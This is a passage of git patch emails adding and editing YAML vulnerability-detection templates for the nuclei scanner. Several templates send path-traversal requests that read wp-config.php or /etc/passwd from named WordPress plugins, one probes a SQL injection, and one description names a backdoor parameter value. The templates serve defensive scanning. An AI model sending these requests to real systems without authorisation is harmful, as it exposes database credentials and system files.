https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php? jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From 5ad972dc6bf9b8e3fd776e13772b2893cc7b0750 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Tue, 26 Oct 2021 08:04:56 +0900 Subject: [PATCH 059/145] Create CVE-2015-5471.yaml --- CVE-2015-5471.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 CVE-2015-5471.yaml diff --git a/CVE-2015-5471.yaml b/CVE-2015-5471.yaml new file mode 100644 index 0000000000..4c6adff168 --- /dev/null +++ b/CVE-2015-5471.yaml @@ -0,0 +1,23 @@ +id: CVE-2015-5471 +info: + name: Swim Team <= v1.44.10777 - Local File Inclusion + author: 0x_Akoko + severity: high + reference: https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568 + tags: wordpress,plugin,wp,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From c3c2fb4945664c5e204accdbe3da55d69a291c73 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Tue, 26 Oct 2021 08:09:35 +0900 Subject: [PATCH 060/145] Create wp-tinymce-thumbnail-plugin-lfi.yaml --- wp-tinymce-thumbnail-plugin-lfi.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 wp-tinymce-thumbnail-plugin-lfi.yaml diff --git a/wp-tinymce-thumbnail-plugin-lfi.yaml b/wp-tinymce-thumbnail-plugin-lfi.yaml new file mode 100644 index 0000000000..0ae06d6b01 --- /dev/null +++ b/wp-tinymce-thumbnail-plugin-lfi.yaml @@ -0,0 +1,26 @@ +id: wp-tinymce-thumbnail-plugin-lfi + +info: + name: Tinymce Thumbnail Gallery <= 1.0.7 - download-image.php LFI + author: 0x_Akoko + severity: high + tags: wordpress,wp-theme,lfi,wp + reference: https://wpscan.com/vulnerability/4a49b023-c1c9-4cc4-a2fd-af5f911bb400 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From bf7070dbc786b501601d8030337c328d4dc26e2e Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 26 Oct 2021 15:26:22 +0700 Subject: [PATCH 061/145] Add CVE-2021-42258 --- cves/2021/CVE-2021-42258.yaml | 66 +++++++++++++++++++++++++++++++++++ 1 file changed, 66 insertions(+) create mode 100644 cves/2021/CVE-2021-42258.yaml diff --git a/cves/2021/CVE-2021-42258.yaml b/cves/2021/CVE-2021-42258.yaml new file mode 100644 index 0000000000..203f286368 --- /dev/null +++ b/cves/2021/CVE-2021-42258.yaml @@ -0,0 +1,66 @@ +id: CVE-2021-42258 + +info: + name: BillQuick Web Suite SQLi + author: dwisiswant0 + severity: high + tags: bqe,cve,cve2021,sqli + description: | + This template supports the detection part only. See references. + + BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 + allows SQL injection for unauthenticated remote code execution, + as exploited in the wild in October 2021 for ransomware installation. + SQL injection can, for example, use the txtID (aka username) parameter. + Successful exploitation can include the ability to execute + arbitrary code as MSSQLSERVER$ via xp_cmdshell. + reference: https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Referer: {{BaseURL}} + Origin: {{RootURL}} + Connection: close + Content-Type: application/x-www-form-urlencoded + + __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96 + + cookie-reuse: true + extractors: + - type: xpath + name: VS + internal: true + attribute: value + xpath: + - "/html/body/form/div/input[@id='__VIEWSTATE']" + + - type: xpath + name: VSG + internal: true + attribute: value + xpath: + - "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']" + + - type: xpath + name: EV + internal: true + attribute: value + xpath: + - "/html/body/form/div/input[@id='__EVENTVALIDATION']" + + matchers: + - type: word + part: body + words: + - "Incorrect syntax near" + - "_ACCOUNTLOCKED" + + + From 9773130879cc402a823b2c2a91db5f878987fdfa Mon Sep 17 00:00:00 2001 From: Dwi Siswanto Date: Tue, 26 Oct 2021 15:31:41 +0700 Subject: [PATCH 062/145] Remove blank lines --- cves/2021/CVE-2021-42258.yaml | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-42258.yaml b/cves/2021/CVE-2021-42258.yaml index 203f286368..47adea9eea 100644 --- a/cves/2021/CVE-2021-42258.yaml +++ b/cves/2021/CVE-2021-42258.yaml @@ -60,7 +60,4 @@ requests: part: body words: - "Incorrect syntax near" - - "_ACCOUNTLOCKED" - - - + - "_ACCOUNTLOCKED" \ No newline at end of file From 1986e1211d358891cc0dea5344e41b8b3130c0fa Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 26 Oct 2021 14:25:37 +0530 Subject: [PATCH 063/145] Adding condition between word matcher --- cves/2021/CVE-2021-42258.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-42258.yaml b/cves/2021/CVE-2021-42258.yaml index 47adea9eea..2920990570 100644 --- a/cves/2021/CVE-2021-42258.yaml +++ b/cves/2021/CVE-2021-42258.yaml @@ -27,7 +27,6 @@ requests: Host: {{Hostname}} Referer: {{BaseURL}} Origin: {{RootURL}} - Connection: close Content-Type: application/x-www-form-urlencoded __EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96 @@ -58,6 +57,8 @@ requests: matchers: - type: word part: body + condition: and words: + - "System.Data.SqlClient.SqlException" - "Incorrect syntax near" - - "_ACCOUNTLOCKED" \ No newline at end of file + - "_ACCOUNTLOCKED" From 2fa9791bdcab1aea46b2ffc0d84552876e2c9bee Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 26 Oct 2021 14:32:23 +0530 Subject: [PATCH 064/145] misc update --- cves/2021/CVE-2021-42258.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-42258.yaml b/cves/2021/CVE-2021-42258.yaml index 2920990570..64def1d504 100644 --- a/cves/2021/CVE-2021-42258.yaml +++ b/cves/2021/CVE-2021-42258.yaml @@ -4,17 +4,17 @@ info: name: BillQuick Web Suite SQLi author: dwisiswant0 severity: high - tags: bqe,cve,cve2021,sqli + tags: cve,cve2021,sqli,billquick description: | - This template supports the detection part only. See references. - BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 allows SQL injection for unauthenticated remote code execution, as exploited in the wild in October 2021 for ransomware installation. SQL injection can, for example, use the txtID (aka username) parameter. Successful exploitation can include the ability to execute arbitrary code as MSSQLSERVER$ via xp_cmdshell. - reference: https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware + reference: + - https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware + - https://nvd.nist.gov/vuln/detail/CVE-2021-42258 requests: - raw: From 8fb9b08e61721144ad21a0baa876ed7512ab7383 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 26 Oct 2021 15:02:32 +0530 Subject: [PATCH 065/145] misc update --- .github/workflows/template-validate.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index a158694063..705f870c7e 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -20,10 +20,8 @@ jobs: - name: Installing Nuclei # if: steps.cache-go.outputs.cache-hit != 'true' - env: - GO111MODULE: on run: | - go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev + go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest shell: bash - name: Template Validation From fb81f4ca362fa57569909200cb7445795cfba33f Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 26 Oct 2021 12:35:56 +0300 Subject: [PATCH 066/145] Better description --- vulnerabilities/wordpress/wp-upload-data.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/wordpress/wp-upload-data.yaml b/vulnerabilities/wordpress/wp-upload-data.yaml index 8539ff6058..9a474dff0a 100644 --- a/vulnerabilities/wordpress/wp-upload-data.yaml +++ b/vulnerabilities/wordpress/wp-upload-data.yaml @@ -4,7 +4,7 @@ info: name: wordpress-upload-data author: pussycat0x severity: medium - description: Searches for Passwords in the wordpress uploads directory. + description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it. reference: https://www.exploit-db.com/ghdb/7040 tags: wordpress,listing From 423584f1b71b7be0f58fe6568bfd6742f51f698e Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 26 Oct 2021 15:08:26 +0530 Subject: [PATCH 067/145] moving files around --- .../wordpress/wp-tinymce-thumbnail-plugin-lfi.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename wp-tinymce-thumbnail-plugin-lfi.yaml => vulnerabilities/wordpress/wp-tinymce-thumbnail-plugin-lfi.yaml (93%) diff --git a/wp-tinymce-thumbnail-plugin-lfi.yaml b/vulnerabilities/wordpress/wp-tinymce-thumbnail-plugin-lfi.yaml similarity index 93% rename from wp-tinymce-thumbnail-plugin-lfi.yaml rename to vulnerabilities/wordpress/wp-tinymce-thumbnail-plugin-lfi.yaml index 0ae06d6b01..33592aa212 100644 --- a/wp-tinymce-thumbnail-plugin-lfi.yaml +++ b/vulnerabilities/wordpress/wp-tinymce-thumbnail-plugin-lfi.yaml @@ -4,7 +4,7 @@ info: name: Tinymce Thumbnail Gallery <= 1.0.7 - download-image.php LFI author: 0x_Akoko severity: high - tags: wordpress,wp-theme,lfi,wp + tags: wordpress,wp-theme,lfi,wordpress reference: https://wpscan.com/vulnerability/4a49b023-c1c9-4cc4-a2fd-af5f911bb400 requests: @@ -15,11 +15,11 @@ requests: matchers-condition: and matchers: - type: word + part: body + condition: and words: - "DB_NAME" - "DB_PASSWORD" - part: body - condition: and - type: status status: From 1e9218db989340a90cd90069592a5a09eb19fe74 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 26 Oct 2021 15:13:55 +0530 Subject: [PATCH 068/145] moving files around --- CVE-2015-5471.yaml => cves/2015/CVE-2015-5471.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename CVE-2015-5471.yaml => cves/2015/CVE-2015-5471.yaml (92%) diff --git a/CVE-2015-5471.yaml b/cves/2015/CVE-2015-5471.yaml similarity index 92% rename from CVE-2015-5471.yaml rename to cves/2015/CVE-2015-5471.yaml index 4c6adff168..c2d47397d1 100644 --- a/CVE-2015-5471.yaml +++ b/cves/2015/CVE-2015-5471.yaml @@ -4,7 +4,7 @@ info: author: 0x_Akoko severity: high reference: https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568 - tags: wordpress,plugin,wp,lfi + tags: cve,cve2015,wordpress,wp-plugin,lfi requests: - method: GET From 9c96179595244775a99b53311e59ef80e0c193eb Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 26 Oct 2021 12:45:16 +0300 Subject: [PATCH 069/145] Fix description --- vulnerabilities/other/solar-log-authbypass.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/solar-log-authbypass.yaml b/vulnerabilities/other/solar-log-authbypass.yaml index 382d65e232..7e3f5cd21d 100644 --- a/vulnerabilities/other/solar-log-authbypass.yaml +++ b/vulnerabilities/other/solar-log-authbypass.yaml @@ -4,7 +4,7 @@ info: name: Solar-Log 500 2.8.2 - Incorrect Access Control author: geeknik severity: high - description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers> + description: The web administration server for Solar-Log 500 all versions prior to 2.8.2 Build 52 does not require authentication, which allows arbitrary remote attackers gain administrative privileges by connecting to the server reference: https://www.exploit-db.com/exploits/49986 tags: solarlog,auth-bypass From 058d859cd849f2047d5df2f2201b1007213bec66 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 26 Oct 2021 12:45:23 +0300 Subject: [PATCH 070/145] Add description --- vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml b/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml index 63829a085e..e4cb6515af 100644 --- a/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml +++ b/vulnerabilities/wordpress/wp-oxygen-theme-lfi.yaml @@ -4,6 +4,7 @@ info: name: WordPress Oxygen-Theme Themes LFI author: 0x_Akoko severity: high + description: The WordPress Oxygen-Theme has a local file inclusion vulnerability in its 'download.php' and 'file' parameter. tags: wordpress,wp-theme,lfi reference: https://cxsecurity.com/issue/WLB-2019030178 From e453bfcb192a6d6fe15aea85b1b2fd38dbf5ed32 Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Tue, 26 Oct 2021 15:17:36 +0530 Subject: [PATCH 071/145] Update redis-commander-exposure.yaml --- exposed-panels/redis-commander-exposure.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/exposed-panels/redis-commander-exposure.yaml b/exposed-panels/redis-commander-exposure.yaml index fea8a67df6..0a0ee65364 100644 --- a/exposed-panels/redis-commander-exposure.yaml +++ b/exposed-panels/redis-commander-exposure.yaml @@ -7,7 +7,7 @@ info: reference: - https://joeferner.github.io/redis-commander/ - https://github.com/joeferner/redis-commander - tags: panel + tags: panel,redis requests: - method: GET @@ -16,7 +16,7 @@ requests: matchers: - type: word + condition: and words: - "Redis Commander" - "redisCommanderBearerToken" - condition: and From 751e90311e336b8aeee13d0092e876b4702d446a Mon Sep 17 00:00:00 2001 From: Sandeep Singh <sandeep@projectdiscovery.io> Date: Tue, 26 Oct 2021 15:20:38 +0530 Subject: [PATCH 072/145] Update sugarcrm-panel.yaml --- exposed-panels/sugarcrm-panel.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/exposed-panels/sugarcrm-panel.yaml b/exposed-panels/sugarcrm-panel.yaml index cd23c86b30..2ee96c18fc 100644 --- a/exposed-panels/sugarcrm-panel.yaml +++ b/exposed-panels/sugarcrm-panel.yaml @@ -13,12 +13,13 @@ requests: - "{{BaseURL}}" - "{{BaseURL}}/index.php?action=Login&module=Users" + stop-at-first-match: true matchers-condition: and matchers: - type: word + part: body words: - "<title>SugarCRM" - part: body - type: status status: From ca66969963b59811d8a2cfc337bfa6571b52f3ab Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Tue, 26 Oct 2021 15:22:18 +0530 Subject: [PATCH 073/145] Update CNVD-2019-06255.yaml --- cnvd/CNVD-2019-06255.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cnvd/CNVD-2019-06255.yaml b/cnvd/CNVD-2019-06255.yaml index 82b7c18ae9..9cebd8d7b0 100644 --- a/cnvd/CNVD-2019-06255.yaml +++ b/cnvd/CNVD-2019-06255.yaml @@ -1,4 +1,5 @@ id: CNVD-2019-06255 + info: name: CatfishCMS RCE author: Lark-Lab @@ -18,9 +19,9 @@ requests: - 200 - type: word + condition: and words: - 'OS' - 'PATH' - 'SHELL' - 'USER' - condition: and From 0f1a9cf2b5490da55a49bb0a9408532ff9030857 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 26 Oct 2021 12:10:09 +0000 Subject: [PATCH 074/145] Auto README Update [Tue Oct 26 12:10:09 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 46fe32d081..28bf53d46e 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | | cve2020 | 166 | madrobot | 63 | file | 50 | | | | | -**177 directories, 2443 files**. +**177 directories, 2446 files**. From 7d0c8669a3af38d1fb51f7d03bb35d4cdfe00d27 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 26 Oct 2021 15:22:21 +0300 Subject: [PATCH 075/145] Add description --- vulnerabilities/other/maccmsv10-backdoor.yaml | 1 + vulnerabilities/other/rockmongo-xss.yaml | 1 + vulnerabilities/other/ruijie-networks-lfi.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/vulnerabilities/other/maccmsv10-backdoor.yaml b/vulnerabilities/other/maccmsv10-backdoor.yaml index 9084b5c2ed..249495b4ed 100644 --- a/vulnerabilities/other/maccmsv10-backdoor.yaml +++ b/vulnerabilities/other/maccmsv10-backdoor.yaml @@ -3,6 +3,7 @@ info: name: Maccmsv10 Backdoor author: princechaddha severity: critical + description: A backdoor has been found in Maccmsv10, the backdoor is accessible via the '/index.php/bbs/index/download' endpoint and the special 'getpwd' parameter value of 'WorldFilledWithLove'. tags: maccmsv10,rce requests: diff --git a/vulnerabilities/other/rockmongo-xss.yaml b/vulnerabilities/other/rockmongo-xss.yaml index d23d822656..e4395968ad 100644 --- a/vulnerabilities/other/rockmongo-xss.yaml +++ b/vulnerabilities/other/rockmongo-xss.yaml @@ -4,6 +4,7 @@ info: name: RockMongo V1.1.8 XSS author: pikpikcu severity: medium + description: A vulnerability in RockMongo allows attackers to inject arbitrary javascript into the response returned by the application. reference: https://packetstormsecurity.com/files/136658/RockMongo-1.1.8-Cross-Site-Request-Forgery-Cross-Site-Scripting.html tags: rockmongo,xss diff --git a/vulnerabilities/other/ruijie-networks-lfi.yaml b/vulnerabilities/other/ruijie-networks-lfi.yaml index 03dde58789..94f932e9bf 100644 --- a/vulnerabilities/other/ruijie-networks-lfi.yaml +++ b/vulnerabilities/other/ruijie-networks-lfi.yaml @@ -4,6 +4,7 @@ info: name: Ruijie Networks Switch eWeb S29_RGOS 11.4 LFI author: pikpikcu severity: high + description: A vulnerability in Ruijie Networks Switch allows remote unauthenticated attackers to access locally stored files and retrieve their content via the 'download.do' endpoint. reference: https://exploit-db.com/exploits/48755 tags: ruijie,lfi From dcf402cfa49902c3b16d41c73b9df4c234adbb50 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 26 Oct 2021 15:23:43 +0300 Subject: [PATCH 076/145] Add description --- vulnerabilities/other/zimbra-preauth-ssrf.yaml | 1 + vulnerabilities/other/zms-auth-bypass.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/vulnerabilities/other/zimbra-preauth-ssrf.yaml b/vulnerabilities/other/zimbra-preauth-ssrf.yaml index d1deffe075..cb99a3ac7a 100644 --- a/vulnerabilities/other/zimbra-preauth-ssrf.yaml +++ b/vulnerabilities/other/zimbra-preauth-ssrf.yaml @@ -4,6 +4,7 @@ info: name: Zimbra Collaboration Suite (ZCS) - SSRF author: gy741 severity: critical + description: A vulnerability in Zimbra Collaboration Suite allows remote unauthenticated attackers to cause the product to include content returned by third-party servers and use it as its own code. reference: - https://www.adminxe.com/2183.html tags: zimbra,ssrf,oast diff --git a/vulnerabilities/other/zms-auth-bypass.yaml b/vulnerabilities/other/zms-auth-bypass.yaml index 65c7df9984..38a20c3a9a 100644 --- a/vulnerabilities/other/zms-auth-bypass.yaml +++ b/vulnerabilities/other/zms-auth-bypass.yaml @@ -4,6 +4,7 @@ info: name: Zoo Management System 1.0 - Authentication Bypass author: dwisiswant0 severity: high + description: A vulnerability in Zoo Management allows remote attackers to bypass the authentication mechanism via an SQL injection vulnerability. reference: https://www.exploit-db.com/exploits/48880 tags: auth-bypass,zms From 4c0e8bae7e1fe9d5098fe22c28b86dd317e5ce83 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 26 Oct 2021 15:24:26 +0300 Subject: [PATCH 077/145] Add description --- vulnerabilities/other/zhiyuan-oa-session-leak.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/other/zhiyuan-oa-session-leak.yaml b/vulnerabilities/other/zhiyuan-oa-session-leak.yaml index 71580aab21..deccd94de0 100644 --- a/vulnerabilities/other/zhiyuan-oa-session-leak.yaml +++ b/vulnerabilities/other/zhiyuan-oa-session-leak.yaml @@ -1,9 +1,10 @@ id: zhiyuan-oa-session-leak info: - name: Zhiyuan Oa Session Leak + name: Zhiyuan OA Session Leak author: pikpikcu severity: medium + description: A vulnerability in Zhiyuan OA allows remote unauthenticated users access to sensitive session information via the 'getSessionList.jsp' endpoint. reference: https://www.zhihuifly.com/t/topic/3345 tags: zhiyuan,leak,disclosure From 57bae34cb98d6c69d8a78c974a768fc39158a7e4 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 26 Oct 2021 15:25:34 +0300 Subject: [PATCH 078/145] Add description --- vulnerabilities/other/yarn-resourcemanager-rce.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/yarn-resourcemanager-rce.yaml b/vulnerabilities/other/yarn-resourcemanager-rce.yaml index 2cd230f11f..1189161af1 100644 --- a/vulnerabilities/other/yarn-resourcemanager-rce.yaml +++ b/vulnerabilities/other/yarn-resourcemanager-rce.yaml @@ -5,6 +5,7 @@ info: author: pdteam severity: low tags: apache,rce + description: A vulnerability in Apache Yarn ResourceManager allows remote unauthenticated users to cause the product to execute arbitrary code. reference: https://neerajsabharwal.medium.com/hadoop-yarn-hack-9a72cc1328b6 requests: From 8adbf37ab49a157d42b569c6644958f60e27af78 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 26 Oct 2021 15:26:10 +0300 Subject: [PATCH 079/145] Add description --- vulnerabilities/other/yapi-rce.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/yapi-rce.yaml b/vulnerabilities/other/yapi-rce.yaml index 92f0058339..e9f9d9d864 100644 --- a/vulnerabilities/other/yapi-rce.yaml +++ b/vulnerabilities/other/yapi-rce.yaml @@ -5,6 +5,7 @@ info: author: pikpikcu severity: critical tags: yapi,rce + description: A vulnerability in Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. reference: - https://www.secpulse.com/archives/162502.html - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b From 5d98d22416eaec4749865a1ca1adac9616abd36f Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 26 Oct 2021 15:27:16 +0300 Subject: [PATCH 080/145] Add description --- vulnerabilities/other/metinfo-lfi.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/metinfo-lfi.yaml b/vulnerabilities/other/metinfo-lfi.yaml index afe3572164..fca0ca4919 100644 --- a/vulnerabilities/other/metinfo-lfi.yaml +++ b/vulnerabilities/other/metinfo-lfi.yaml @@ -4,6 +4,7 @@ info: author: pikpikcu severity: high reference: https://paper.seebug.org/676/ + description: A vulnerability in MetInfo allows remote unauthenticated attackers access to locally stored files and their content. tags: metinfo,lfi requests: From 25f7c812c260f6a91021be455a111bb72393bedb Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 26 Oct 2021 15:27:57 +0300 Subject: [PATCH 081/145] Add description --- vulnerabilities/other/opensns-rce.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/opensns-rce.yaml b/vulnerabilities/other/opensns-rce.yaml index 5bccb904ea..8935365a70 100644 --- a/vulnerabilities/other/opensns-rce.yaml +++ b/vulnerabilities/other/opensns-rce.yaml @@ -4,6 +4,7 @@ info: name: OpenSNS Remote Code Execution Vulnerability author: gy741 severity: critical + description: A vulnerability in OpenSNS allows remote unauthenticated attackers to cause the product to execute arbitrary code via the 'shareBox' endpoint. reference: - http://www.0dayhack.net/index.php/2417/ - https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E From 093a495b5f289cdf1a256b065685c57c8144e6e6 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 26 Oct 2021 15:28:43 +0300 Subject: [PATCH 082/145] Add description --- vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml index 7d1c7a4706..e2fc51ac29 100644 --- a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml +++ b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml @@ -4,6 +4,7 @@ info: name: Sonicwall SSLVPN ShellShock RCE author: PR3R00T severity: critical + description: A vulnerability in Sonicwall SSLVPN contains a 'ShellShock' vulnerability which allows remote unauthenticated attackers to execute arbitrary commands. reference: - https://twitter.com/chybeta/status/1353974652540882944 - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ From c9efc02223ae079e2aafb12a225238b1d1e2c443 Mon Sep 17 00:00:00 2001 From: Noam Rathaus Date: Tue, 26 Oct 2021 15:29:20 +0300 Subject: [PATCH 083/145] Add description --- vulnerabilities/other/seacms-rce.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/vulnerabilities/other/seacms-rce.yaml b/vulnerabilities/other/seacms-rce.yaml index 9566dc21e3..7f2dbaec18 100644 --- a/vulnerabilities/other/seacms-rce.yaml +++ b/vulnerabilities/other/seacms-rce.yaml @@ -3,6 +3,7 @@ info: name: SeaCMS V6.4.5 RCE author: pikpikcu severity: high + description: A vulnerability in SeaCMS allows remote unauthenticated attackers to execute arbitrary PHP code. reference: https://mengsec.com/2018/08/06/SeaCMS-v6-45前台代码执行漏洞分析/ tags: seacms,rce From b0401ff6737a215fac554d6ffdf5cb005fd50205 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 26 Oct 2021 22:23:59 +0530 Subject: [PATCH 084/145] Add files via upload --- exposed-panels/openemr-detect.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/openemr-detect.yaml diff --git a/exposed-panels/openemr-detect.yaml b/exposed-panels/openemr-detect.yaml new file mode 100644 index 0000000000..1b43237045 --- /dev/null +++ b/exposed-panels/openemr-detect.yaml @@ -0,0 +1,21 @@ +id: openemr-detect +info: + name: DOpenEMR Product Detect + author: pussycat0x + severity: info + metadata: + shodan-dork: 'app="OpenEMR"' + tags: panel +requests: + - method: GET + path: + - "{{BaseURL}}/interface/login/login.php?site=default" + matchers-condition: and + matchers: + - type: word + words: + - '"title":"OpenEMR Product Registration"' + condition: and + - type: status + status: + - 200 \ No newline at end of file From 3893a0b6fb520e5b8065c7284d432b62db6d4141 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 26 Oct 2021 22:48:33 +0530 Subject: [PATCH 085/145] Create ibm-sterling-detect.yaml --- technologies/ibm/ibm-sterling-detect.yaml | 24 +++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/ibm/ibm-sterling-detect.yaml diff --git a/technologies/ibm/ibm-sterling-detect.yaml b/technologies/ibm/ibm-sterling-detect.yaml new file mode 100644 index 0000000000..54d913fbc7 --- /dev/null +++ b/technologies/ibm/ibm-sterling-detect.yaml @@ -0,0 +1,24 @@ +id: ibm-sterling-detect + +info: + name: IBM Sterling File Gateway Detect + author: princechaddha + severity: info + tags: tech,sterling,ibm + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Welcome to IBM Sterling File Gateway" + + - type: status + status: + - 200 From 09156e1a2a6196549feace19712a29d390dc41bd Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 26 Oct 2021 17:18:56 +0000 Subject: [PATCH 086/145] Auto README Update [Tue Oct 26 17:18:56 UTC 2021] :robot: --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 28bf53d46e..c3857fb33d 100644 --- a/README.md +++ b/README.md @@ -53,7 +53,7 @@ An overview of the nuclei template project, including statistics on unique tags, | wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | | cve2020 | 166 | madrobot | 63 | file | 50 | | | | | -**177 directories, 2446 files**. +**177 directories, 2447 files**. </td> </tr> From 9a371a6a25ce49b1407b824fae6c559cefedfeb8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: 